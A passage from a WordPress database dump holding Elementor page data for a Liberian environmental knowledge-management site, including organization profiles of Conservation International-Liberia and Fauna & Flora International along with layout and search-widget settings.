fruit\";i:7;s:8:\"palm oil\";i:8;s:6:\"people\";}}}'),(18585,2728,'_wp_attached_file','2019/11/featured_ffi.png'),(18586,2728,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:24:\"2019/11/featured_ffi.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"featured_ffi-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"featured_ffi-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"featured_ffi-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18587,1612,'_thumbnail_id','3214'),(18588,2729,'_elementor_edit_mode','builder'),(18589,2729,'_elementor_template_type','wp-post'),(18590,2729,'_elementor_version','2.7.5'),(18591,2729,'_wp_page_template','default'),(18592,2729,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a2232e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"11bbe920\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a1852cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"45f11703\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ci\\\",\\\"tag_id\\\":\\\"50\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ci\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2db389f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3054dac6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21e7308e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"331470f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ci\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18593,2729,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18595,2729,'_thumbnail_id','2727'),(18597,2730,'_elementor_edit_mode','builder'),(18598,2730,'_elementor_template_type','wp-post'),(18599,2730,'_elementor_version','2.7.5'),(18600,2730,'_wp_page_template','default'),(18601,2730,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18602,2730,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18603,2730,'_thumbnail_id','2728'),(18615,2734,'_wp_page_template','default'),(18616,2734,'_elementor_edit_mode','builder'),(18617,2734,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, 